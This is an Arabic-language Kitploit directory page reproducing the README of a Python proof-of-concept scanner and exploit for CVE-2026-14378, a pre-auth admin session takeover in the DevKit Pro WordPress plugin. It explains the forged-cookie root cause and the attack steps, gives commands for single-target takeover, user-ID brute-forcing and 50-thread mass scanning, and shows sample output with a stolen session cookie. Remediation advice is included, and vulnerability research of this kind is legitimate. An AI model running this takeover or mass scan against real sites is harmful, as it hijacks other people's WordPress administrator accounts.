Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-19660 — ماسح PoC بلغة Python واستغلال لـ CVE-2026-14378، وهو استيلاء على جلسة مسؤول قبل المصادقة في إضافة DevKit Pro لـ WordPress عبر ملف تعريف ارتباط original_user_id مزوّر. | Kitploit
أدوات/GitHubGitHub/murrez/cve-2026-19660
ماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتأمن الويباختبار الاختراقالمصادقةالفريق الأحمر
GitHubmurrez/cve-2026-19660

CVE-2026-19660

ماسح PoC بلغة Python واستغلال لـ CVE-2026-14378، وهو استيلاء على جلسة مسؤول قبل المصادقة في إضافة DevKit Pro لـ WordPress عبر ملف تعريف ارتباط original_user_id مزوّر.

منذ 20س 8دلم تتم المراجعة بعد
عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-14378 — تجاوز المصادقة في DevKit Pro (إثبات مفهوم)

أداة فحص وإثبات مفهوم لاستغلال CVE-2026-14378: الاستيلاء على جلسة مسؤول دون مصادقة في إضافة ووردبريس DevKit Pro (dplugins) عبر خلل في تدفق "الرجوع" الخاص بتبديل المستخدم.

قانوني: استخدم هذا فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به غير قانوني. هذا المستودع مخصص للبحث الدفاعي والتحقق والتحقق من التصحيحات.


وصف مستودع GitHub (نسخ ولصق)

PoC for CVE-2026-14378: DevKit Pro ≤2.3.0 pre-auth admin takeover via forged original_user_id cookie + wp_footer revert_switch nonce. check/admin + mass scan.

المواضيع المقترحة: cve-2026-14378, wordpress, wordpress-exploit, devkit-pro, dplugins, authentication-bypass, poc, security-research


نظرة سريعة على الثغرة

CVECVE-2026-14378
المنتجDevKit Pro (المورد: dplugins)
النوعتجاوز المصادقة → جلسة مسؤول كاملة (CWE-287)
المتأثرجميع الإصدارات ≤ 2.3.0
المُصحَّح3.0.0+ (سجل التغييرات)
CVSS 3.19.8 حرج — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence

استشارة ذات صلة (نفس المنتج، ثغرة مختلفة)

CVEالمشكلةالمصادقة
CVE-2026-14357تثبيت ملف ZIP عشوائي للقالب عبر DPDEV_install_themesSubscriber+
CVE-2026-14378الاستيلاء على الجلسة عبر الرجوع من تبديل المستخدملا شيء

هذا الإثبات يستهدف 14378 فقط.


السبب الجذري (تقني)

يمكن لـ Users Manager في DevKit Pro انتحال هوية المستخدمين للاختبار. عندما ينتقل المسؤول إلى حساب آخر، تخزّن الإضافة الهوية السابقة في ملف تعريف ارتباط على العميل:

  • original_user_id — معرّف المستخدم للحساب قبل التبديل

عند وجود ملف تعريف الارتباط هذا، تعرض الإضافة عنصر تحكم "الرجوع" في wp_footer على الواجهة الأمامية، بما في ذلك nonce من ووردبريس مرتبط بإجراء الرجوع.

معالج revert_switch (AJAX) يستدعي verify_nonce_and_capability()، الذي يقيّم manage_options بشكل خاطئ مقابل المستخدم المشار إليه بواسطة original_user_id، بدلاً من استخدام current_user_can() على الطالب الفعلي (الذي قد يكون غير مصادق عليه تماماً).

يمكن للمهاجم:

  1. تعيين Cookie: original_user_id=<administrator_user_id> (عادةً 1).
  2. طلب أي صفحة عامة وتحليل التذييل للعثور على نموذج الرجوع / nonce.
  3. إرسال POST إلى wp-admin/admin-ajax.php مع action=revert_switch (أو اسم مستعار خاص بالإضافة) و nonce المسرّب.
  4. تفعيل wp_set_auth_cookie() لمعرّف المستخدم المزوّر → جلسة مسؤول مصادق عليها.

سياق الميزة الرسمي: Users Manager — switch back.


تدفق الهجوم

sequenceDiagram
    participant A as Attacker
    participant W as WordPress (front end)
    participant P as DevKit Pro
    participant X as admin-ajax.php

    A->>W: GET / (Cookie: original_user_id=1)
    W->>P: wp_footer hook
    P-->>W: switch-back HTML + nonce
    W-->>A: page body contains nonce
    A->>X: POST action=revert_switch + nonce
    Note over P,X: capability checked for user 1, not attacker
    X-->>A: Set-Cookie wordpress_logged_in_*
    A->>W: GET /wp-admin/
    W-->>A: admin dashboard

متى ينجح الفحص ومتى يفشل

أمر check صارم عن قصد: يبلّغ عن قابلية الاستغلال فقط إذا ظهر nonce الرجوع بعد تزوير original_user_id.

الملاحظةالمعنى المحتمل
VULNERABLE — switch-back material leakedمسار الاستغلال يعمل على الأرجح؛ أكّد في مختبر قبل admin.
not vulnerable (check): no switch-back nonce…DevKit مُصحَّح (≥ 3.0.0)، الإضافة غير مثبتة، Users Manager معطّل (معطّل افتراضياً)، مسار إضافة مخصص، ذاكرة تخزين مؤقت/CDN يزيل التذييل، أو موقع خاطئ.
DevKit Pro readme not confirmedلا يوجد بصمة readme.txt عامة؛ قد تكون الإضافة موجودة لكن مخفية — يبقى الاختبار الحاسم هو الأوراكل.
DevKit Pro <= 2.3.0 suspected + لا يزال لا يوجد nonceقد يكون الإصدار القابل للاستغلال مثبتاً لكن ميزة التبديل غير مفعّلة أو التذييل غير معروض على عناوين URL المختبرة.

ملاحظة: استجابة HTTP 200 على /wp-content/plugins/.../readme.txt التي تُرجع صفحة HTML كاملة هي 404 ناعمة شائعة في ووردبريس. يتحقق هذا الإثبات من محتوى readme (ترويسة Plugin Name:)، وليس من رمز الحالة وحده.


المتطلبات

  • Python 3.9+
  • requests
pip install requests

اختياري: يحتوي requirements.txt على حد أدنى مثبّت:

requests>=2.28.0

التثبيت

git clone https://github.com/YOUR_USER/cve-2026-14378-poc.git
cd cve-2026-14378-poc
pip install -r requirements.txt   # or: pip install requests

الاستخدام

هدف واحد — الكشف فقط (آمن)

لا يكمل الاستيلاء؛ يختبر فقط أوراكل nonce في التذييل.

python poc.py check https://target.example/
python poc.py check https://target.example/ --user-id 2
python poc.py check https://target.example/ --timeout 40

هدف واحد — الاستيلاء على الجلسة

يحاول revert_switch الكامل ويتحقق من الوصول إلى /wp-admin/.

python poc.py admin https://target.example/
python poc.py admin https://target.example/ --user-id 1 --brute 5
python poc.py admin https://target.example/ --log successes.txt
الخيارالوصف
--user-idمعرّف المستخدم المسؤول (أو الهدف) المزوّر في original_user_id (افتراضي: 1)
--bruteتجربة المعرّفات 1..N عندما يفشل المعرّف الأول
--timeoutمهلة HTTP بالثواني (افتراضي: 25)
--logإلحاق عناوين URL الناجحة لـ admin بملف (افتراضي: logs.txt)

فحص جماعي (ملف قائمة)

عنوان URL واحد لكل سطر؛ يتم تجاهل تعليقات # والأعمدة الإضافية بعد المسافة البيضاء.

# Detection only (recommended first pass)
python poc.py targets.txt

# Exploit attempts (authorized targets only)
python poc.py targets.txt admin

إذا لم يتم تمرير ملف كوسيطة أولى، يطلب النص مسار قائمة (نفس سلوك أدوات الفحص الجماعي القديمة).

يستخدم الوضع الجماعي مجموعة خيوط (50 عاملاً). اضبطها في poc.py إذا واجهت حدود المعدل.

مثال ملف قائمة

# FOFA / manual imports
https://staging.example.com
example.org
192.0.2.10|wordpress|1.2.3   # only first token is used

مثال المخرجات

قابل للاستغلال (check):

[*] https://vulnerable.example
[+] DevKit Pro <= 2.3.0 suspected (stable tag 2.3.0)
[+] VULNERABLE — switch-back material leaked (action=revert_switch, nonce=a1b2c3d4…)

غير قابل للاستغلال (فحص جماعي نموذجي):

[*] https://patched.example
[!] DevKit Pro readme not confirmed (hidden path, WAF, or plugin absent)
[-] not vulnerable (check): no switch-back nonce in wp_footer with forged original_user_id cookie — patched DevKit, Users Manager off, or wrong target

نجاح admin:

[*] https://lab.local
[+] https://lab.local -> administrator session as user_id=1
[+] cookie: wordpress_logged_in_…=…

ملاحظات التنفيذ

  • HTTP: التحقق من TLS معطّل (verify=False) لفحص بأسلوب اختبار الاختراق؛ يتم اتباع إعادة التوجيه؛ تراجع اختياري HTTP↔HTTPS عند الأخطاء.
  • إجراءات AJAX المجرّبة: revert_switch, DPDEV_revert_switch, dpdev_revert_switch, devkit_revert_switch (إضافة تجارية؛ قد يختلف اسم الخطاف الدقيق حسب البنية).
  • صفحات الأوراكل: /, /?p=1, /sample-page/, /index.php مع ملف تعريف ارتباط مزوّر.
  • إشارات النجاح: ملف تعريف ارتباط wordpress_logged_in_* و/أو علامات لوحة تحكم /wp-admin/.

DevKit Pro غير موزّع على wordpress.org؛ يعتمد تحديد الإصدار على readme.txt المكشوف عند وجوده.


المعالجة

  1. قم بترقية DevKit Pro إلى 3.0.0 أو أحدث.
  2. إذا تأخر الترقية، عطّل Users Manager / تبديل المستخدم حتى التصحيح (يقلل التعرض؛ أكّد مع إرشادات المورد).
  3. راجع جلسات المسؤول وسجلات التدقيق بحثاً عن نشاط revert_switch مشبوه في admin-ajax.php مع ملفات تعريف ارتباط مزوّرة.

تنزيل الأداة